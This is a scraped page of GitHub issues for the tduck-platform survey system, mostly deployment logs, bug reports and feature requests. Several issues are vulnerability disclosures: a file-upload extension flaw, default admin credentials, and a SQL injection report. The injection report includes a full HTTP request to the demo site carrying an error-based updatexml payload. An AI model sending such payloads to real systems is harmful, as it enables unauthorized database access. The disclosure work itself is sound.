tduckcloud / tduck-platform Goto Github PK
View Code? Open in Web Editor NEWA questionnaire system that can be privatized and deployed - 填鸭表单问卷系统(tduck-survey-form)
Home Page: https://www.tduckcloud.com
License: MIT License
A questionnaire system that can be privatized and deployed - 填鸭表单问卷系统(tduck-survey-form)
Home Page: https://www.tduckcloud.com
License: MIT License
spring boot提示:
s.w.s.m.m.a.RequestMappingHandlerMapping : Mapped to org.springframework.boot.autoconfigure.web.servlet.error.BasicErrorController#errorHtml(HttpServletRequest, HttpServletResponse)
前台访问是404错误
curl访问,没有任何提示
建议大神把业务逻辑写service里,不然没有事务呢。
已填写完问卷后,如果有可以打印的功能,就完美了
根据经验和名字,这个类基本上就是一个通用类,统一作为文件上传功能的接口,如果能上传上去,可能会有执行权限的风险,在阅读了一部分的springboot的文档后发现如下
首先进入avatar函数,这个函数会接收名为file的数据并赋值到file中,文件类型是[MultipartFile](https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/multipart/MultipartFile.html),是springboot接受文件内容的类。
**随后进入37行,这里对目标path进行了赋值,问题也出在这里。file.getOriginalFilename()获取到我们上传文件的全部名称。FileUtil.extName,获取到了我们上传文件的后缀。使用随机值作为名字。赋值给了path。这里后缀我们可控。**也是这个漏洞的核心点
String path = IdUtil.simpleUUID() + '.' + FileUtil.extName(file.getOriginalFilename());
接下来进入到处理文件的代码,38行。调用了OssStorageFactory.getStorageService()方法,我们进入这个方法中,简单判断下默认属性,进入到build()函数中,主要看build函数,点击跳进去。
前面先对config进行了赋值,同时对上传文件的属性进行了判断,支持云上传。如果没有配置,那么直接进入后面的else判断。上传文件到本地。
首先进入44行,创建一个ApplicationHome类,给config分别赋值Domain和UploadFolder。随后创建一个LocalStorageService类并返回。随后回到最开始的OssStorageFactory.getStorageService().upload(file.getInputStream(), path),这里的LocalStorageService是OssStorageFactory的实现类,进入LocalStorageService的upload方法,如下所示:
接收传过来的文件的流和path,23行对目标进行设置文件路径,以path结尾,这里path前面进行了名称重命名,所以无法进行目录穿越。但是文件这时已经传上去了,对后缀并未进行检测。随后返回数据。
至此,完成了文件上传,至于利用方式,当前只能传html,其他的不解析。
去看安装文档就能知道,我们是直接下载sql数据库进行网站的安装的。根据官网提示,也是让我们直接创建一个数据库,随后导入这个sql文件,进行网站的搭建的。
这里会默认创建两个账号,一个是[email protected] , 另外一个是[email protected] 。其中[email protected]这个账号是管理员账号。这两个账号对应的密码为123456,12345678。均为hash加密。
鉴于这个sql文件是作为开发网站使用的sql,其中包含着网站相关的配置,一般开发者会直接使用默认账号密码进行配置。而不会是删除初始账号和密码
部署后访问报 502 无访问日志
tduck-platform |
tduck-platform | . ____ _ __ _ _
tduck-platform | /\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
tduck-platform | ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
tduck-platform | \\/ ___)| |_)| | | | | || (_| | ) ) ) )
tduck-platform | ' |____| .__|_| |_|_| |_\__, | / / / /
tduck-platform | =========|_|==============|___/=/_/_/_/
tduck-platform | :: Spring Boot :: (v2.7.8)
tduck-platform |
tduck-platform | 2023-04-14 15:09:13.527 INFO 9 --- [ main] com.tduck.cloud.api.TduckApiApplication : Starting TduckApiApplication using Java 1.8.0_272 on bf7cbaa2d908 with PID 9 (/application/BOOT-INF/classes started by root in /application)
tduck-platform | 2023-04-14 15:09:13.539 DEBUG 9 --- [ main] com.tduck.cloud.api.TduckApiApplication : Running with Spring Boot v2.7.8, Spring v5.3.25
tduck-platform | 2023-04-14 15:09:13.540 INFO 9 --- [ main] com.tduck.cloud.api.TduckApiApplication : The following 1 profile is active: "prod"
tduck-platform | 2023-04-14 15:09:13.568 INFO 9 --- [kground-preinit] o.h.validator.internal.util.Version : HV000001: Hibernate Validator 6.2.5.Final
tduck-platform | 2023-04-14 15:09:15.321 INFO 9 --- [ main] .s.d.r.c.RepositoryConfigurationDelegate : Bootstrapping Spring Data MongoDB repositories in DEFAULT mode.
tduck-platform | 2023-04-14 15:09:15.346 INFO 9 --- [ main] .s.d.r.c.RepositoryConfigurationDelegate : Finished Spring Data repository scanning in 18 ms. Found 0 MongoDB repository interfaces.
tduck-platform | 2023-04-14 15:09:16.356 INFO 9 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat initialized with port(s): 8999 (http)
tduck-platform | 2023-04-14 15:09:16.370 INFO 9 --- [ main] o.a.coyote.http11.Http11NioProtocol : Initializing ProtocolHandler ["http-nio-8999"]
tduck-platform | 2023-04-14 15:09:16.371 INFO 9 --- [ main] o.apache.catalina.core.StandardService : Starting service [Tomcat]
tduck-platform | 2023-04-14 15:09:16.373 INFO 9 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet engine: [Apache Tomcat/9.0.71]
tduck-platform | 2023-04-14 15:09:16.475 INFO 9 --- [ main] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring embedded WebApplicationContext
tduck-platform | 2023-04-14 15:09:16.476 INFO 9 --- [ main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 2805 ms
tduck-platform | 2023-04-14 15:09:16.736 WARN 9 --- [ main] n.sf.ehcache.config.CacheConfiguration : Cache 'eternal_cache' is set to eternal but also has TTI/TTL set. To avoid this warning, clean up the config removing conflicting values of eternal, TTI and TTL. Effective configuration for Cache 'eternal_cache' will be eternal='true', timeToIdleSeconds='0', timeToLiveSeconds='0'.
tduck-platform | _ _ |_ _ _|_. ___ _ | _
tduck-platform | | | |\/|_)(_| | |_\ |_)||_|_\
tduck-platform | / |
tduck-platform | 3.5.3
tduck-platform | 2023-04-14 15:09:18.944 INFO 9 --- [ main] com.zaxxer.hikari.HikariDataSource : DatebookHikariCP - Starting...
tduck-platform | 2023-04-14 15:09:19.205 INFO 9 --- [ main] com.zaxxer.hikari.HikariDataSource : DatebookHikariCP - Start completed.
tduck-platform | 2023-04-14 15:09:19.214 DEBUG 9 --- [ main] c.t.c.e.m.SysEnvConfigMapper.selectList : ==> Preparing: SELECT id,env_key,env_value,create_time,update_time FROM sys_env_config
tduck-platform | 2023-04-14 15:09:19.241 DEBUG 9 --- [ main] c.t.c.e.m.SysEnvConfigMapper.selectList : ==> Parameters:
tduck-platform | 2023-04-14 15:09:19.372 DEBUG 9 --- [ main] c.t.c.e.m.SysEnvConfigMapper.selectList : <== Total: 2
tduck-platform | 2023-04-14 15:09:20.165 INFO 9 --- [ main] .a.c.c.AjCaptchaServiceAutoConfiguration : 自定义配置项:
tduck-platform | AjCaptchaProperties{type=DEFAULT, jigsaw='', picClick='', waterMark='tduck', waterFont='WenQuanZhengHei.ttf', fontType='WenQuanZhengHei.ttf', slipOffset='5', aesStatus=true, interferenceOptions='0', cacheNumber='1000', timingClear='180', cacheType=local, reqFrequencyLimitEnable=false, reqGetLockLimit=5, reqGetLockSeconds=300, reqGetMinuteLimit=100, reqCheckMinuteLimit=100, reqVerifyMinuteLimit=100}
tduck-platform | 2023-04-14 15:09:20.169 INFO 9 --- [ main] c.a.c.s.impl.CaptchaServiceFactory : supported-captchaCache-service:[local]
tduck-platform | 2023-04-14 15:09:20.175 INFO 9 --- [ main] c.a.c.s.impl.CaptchaServiceFactory : supported-captchaTypes-service:[clickWord, default, blockPuzzle]
tduck-platform | 2023-04-14 15:09:20.200 INFO 9 --- [ main] com.anji.captcha.util.ImageUtils : 初始化底图:[SLIDING_BLOCK=[Ljava.lang.String;@30517a57, ORIGINAL=[Ljava.lang.String;@3dde5f38, PIC_CLICK=[Ljava.lang.String;@79ad1774]
tduck-platform | 2023-04-14 15:09:20.201 INFO 9 --- [ main] c.a.c.s.i.ClickWordCaptchaServiceImpl : --->>>初始化验证码底图<<<---clickWord
tduck-platform | 2023-04-14 15:09:20.374 INFO 9 --- [ main] c.a.c.s.i.ClickWordCaptchaServiceImpl : 初始化local缓存...
tduck-platform | 2023-04-14 15:09:20.493 INFO 9 --- [ main] com.anji.captcha.util.ImageUtils : 初始化底图:[SLIDING_BLOCK=[Ljava.lang.String;@33a47707, ORIGINAL=[Ljava.lang.String;@4d290757, PIC_CLICK=[Ljava.lang.String;@720a1fd0]
tduck-platform | 2023-04-14 15:09:20.495 INFO 9 --- [ main] c.a.c.s.i.BlockPuzzleCaptchaServiceImpl : --->>>初始化验证码底图<<<---blockPuzzle
tduck-platform | 2023-04-14 15:09:20.575 INFO 9 --- [ main] c.a.c.s.i.BlockPuzzleCaptchaServiceImpl : 初始化local缓存...
tduck-platform | 2023-04-14 15:09:20.834 INFO 9 --- [ main] c.tduck.cloud.api.config.JacksonConfig : 初始化 jackson 配置
tduck-platform | 2023-04-14 15:09:20.959 INFO 9 --- [ main] o.s.b.a.w.s.WelcomePageHandlerMapping : Adding welcome page: class path resource [static/index.html]
tduck-platform | 2023-04-14 15:09:21.162 ERROR 9 --- [ main] c.t.c.storage.cloud.OssStorageFactory : 更新存储配置失败:null
tduck-platform | 2023-04-14 15:09:23.152 INFO 9 --- [ main] o.a.coyote.http11.Http11NioProtocol : Starting ProtocolHandler ["http-nio-8999"]
tduck-platform | 2023-04-14 15:09:23.185 INFO 9 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat started on port(s): 8999 (http) with context path ''
tduck-platform | 2023-04-14 15:09:23.209 INFO 9 --- [ main] com.tduck.cloud.api.TduckApiApplication : Started TduckApiApplication in 10.366 seconds (JVM running for 10.822)
tduck-mysql | 2023-04-14 14:10:20+08:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started.
tduck-mysql | 2023-04-14 14:10:20+08:00 [Note] [Entrypoint]: Switching to dedicated user 'mysql'
tduck-mysql | 2023-04-14 14:10:20+08:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started.
tduck-mysql | '/var/lib/mysql/mysql.sock' -> '/var/run/mysqld/mysqld.sock'
tduck-mysql | 2023-04-14T06:10:21.174903Z 0 [Warning] [MY-011068] [Server] The syntax '--skip-host-cache' is deprecated and will be removed in a future release. Please use SET GLOBAL host_cache_size=0 instead.
tduck-mysql | 2023-04-14T06:10:21.176340Z 0 [Warning] [MY-010918] [Server] 'default_authentication_plugin' is deprecated and will be removed in a future release. Please use authentication_policy instead.
tduck-mysql | 2023-04-14T06:10:21.176374Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.32) starting as process 1
tduck-mysql | 2023-04-14T06:10:21.182663Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started.
tduck-mysql | 2023-04-14T06:10:23.525901Z 1 [System] [MY-013577] [InnoDB] InnoDB initialization has ended.
tduck-mysql | 2023-04-14T06:10:24.646375Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed.
tduck-mysql | 2023-04-14T06:10:24.646610Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel.
tduck-mysql | 2023-04-14T06:10:24.749448Z 0 [Warning] [MY-011810] [Server] Insecure configuration for --pid-file: Location '/var/run/mysqld' in the path is accessible to all OS users. Consider choosing a different directory.
tduck-mysql | 2023-04-14T06:10:24.787622Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. Bind-address: '::' port: 33060, socket: /var/run/mysqld/mysqlx.sock
tduck-mysql | 2023-04-14T06:10:24.787883Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL.
tduck-mysql | 2023-04-14T07:08:30.309381Z 0 [System] [MY-013172] [Server] Received SHUTDOWN from user <via user signal>. Shutting down mysqld (Version: 8.0.32).
tduck-mysql | 2023-04-14T07:08:32.310562Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 24 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.311031Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 25 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.311717Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 26 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.312211Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 27 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.312629Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 21 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.312903Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 22 user: 'root'.
tduck-mysql | 2023-04-14T07:08:32.313388Z 0 [Warning] [MY-010909] [Server] /usr/sbin/mysqld: Forcing close of thread 23 user: 'root'.
tduck-mysql | 2023-04-14T07:08:34.007348Z 0 [System] [MY-010910] [Server] /usr/sbin/mysqld: Shutdown complete (mysqld 8.0.32) MySQL Community Server - GPL.
tduck-mysql | 2023-04-14 15:08:36+08:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started.
tduck-mysql | 2023-04-14 15:08:36+08:00 [Note] [Entrypoint]: Switching to dedicated user 'mysql'
tduck-mysql | 2023-04-14 15:08:36+08:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started.
tduck-mysql | '/var/lib/mysql/mysql.sock' -> '/var/run/mysqld/mysqld.sock'
tduck-mysql | 2023-04-14T07:08:36.640496Z 0 [Warning] [MY-011068] [Server] The syntax '--skip-host-cache' is deprecated and will be removed in a future release. Please use SET GLOBAL host_cache_size=0 instead.
tduck-mysql | 2023-04-14T07:08:36.641872Z 0 [Warning] [MY-010918] [Server] 'default_authentication_plugin' is deprecated and will be removed in a future release. Please use authentication_policy instead.
tduck-mysql | 2023-04-14T07:08:36.641903Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.32) starting as process 1
tduck-mysql | 2023-04-14T07:08:36.710657Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started.
tduck-mysql | 2023-04-14T07:08:38.112355Z 1 [System] [MY-013577] [InnoDB] InnoDB initialization has ended.
tduck-mysql | 2023-04-14T07:08:39.256039Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed.
tduck-mysql | 2023-04-14T07:08:39.256233Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel.
tduck-mysql | 2023-04-14T07:08:39.389391Z 0 [Warning] [MY-011810] [Server] Insecure configuration for --pid-file: Location '/var/run/mysqld' in the path is accessible to all OS users. Consider choosing a different directory.
tduck-mysql | 2023-04-14T07:08:39.410490Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. Bind-address: '::' port: 33060, socket: /var/run/mysqld/mysqlx.sock
tduck-mysql | 2023-04-14T07:08:39.410632Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL.
版本信息
是否是最新代码:是
演示环境是否有该问题?
演示环境地址:https://form.777nx.cn
提供你复现出该问题的演示环境地址
回显步骤
我操作了用户管理添加用户 然后出现了sql语句错误
Error updating database. Cause: com.mysql.cj.jdbc.exceptions.MysqlDataTruncation: Data truncation: Data too long for column 'avatar' at row 1 ### The error may exist in com/tduck/cloud/account/mapper/UserMapper.java (best guess) ### The error may involve com.tduck.cloud.account.mapper.UserMapper.insert-Inline ### The error occurred while setting parameters ### SQL: INSERT INTO ac_user ( name, avatar, gender, phone_number, email, password, password_type, create_time, update_time ) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ? ) ### Cause: com.mysql.cj.jdbc.exceptions.MysqlDataTruncation: Data truncation: Data too long for column 'avatar' at row 1 ; Data truncation: Data too long for column 'avatar' at row 1; nested exception is com.mysql.cj.jdbc.exceptions.MysqlDataTruncation: Data truncation: Data too long for column 'avatar' at row 1
Then, within the downloadFormResultFile method of the downloadFormResultFile class(com.tduck.cloud.api.web.controller.downloadFormResultFile), this method is invoked.
According to the route information, access the URL address, and use error-based injection to retrieve the database name, thereby verifying the existence of the vulnerability.
https://demo.tduckapp.com/project
) and register a user using the registration function ([email protected]/123456) (使用官网的demo环境进行验证(https://demo.tduckapp.com/project
),使用注册功能注册一个用户([email protected]/123456))POST /user/form/data/query?timestamp=1702986363697&sign=d40296262a3e99f608de2a9d7e435658 HTTP/1.1
Host: demo.tduckapp.com
Cookie: Hm_lvt_4dbdbc5421c41984499f878628d60f2f=1702985656; Hm_lpvt_4dbdbc5421c41984499f878628d60f2f=1702985890
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIyMTMyMSIsImlhdCI6MTcwMjk4NTg0NCwiZXhwIjoxNzAzNTkwNjQ0fQ.illpxfzf2O1AeJ3Ra3AHLgRufKgL9_KK1MAwfu0_l9C7GxSJT_ta9cDipGVWEhMijrS79N3lAksz7DgUzlhwUg
Content-Length: 122
Origin: https://demo.tduckapp.com
Referer: https://demo.tduckapp.com/project/form/data?key=MVWB25aE&active=data&type=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"authGroupId":null,"formKey":"MVWB25aE' or updatexml(1,concat(0x7e,user(),0x7e),1)='1","filter":{},"size":10,"current":0}
user()
, the vulnerability is successfully verified.(产生sql报错页面并成功回显user()
,漏洞验证成功)FormDataMysqlService.java 中对应的search 方法,对request传入的formKey参数未做任何限制,直接拼接sql进行执行
This sqli affects the latest version of the curren(v4.0)
Using precompiled binding parameters(使用预编译绑定参数)
//阿里云官方api参考:request.setTemplateParam("{"变量1":"值1","变量2":"值2","变量3":"值3"}")
request.setTemplateParam("{"name":"Tom", "code":"123"}");
error file AliyunSmsServiceImpl.java
error code line46 Map<String, Object> params = ImmutableMap.of("code", templateParams);
在部署文档里面没有看到介绍如何在docker里面添加参数配置邮箱和公众号,是否能告知一下,谢谢!
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.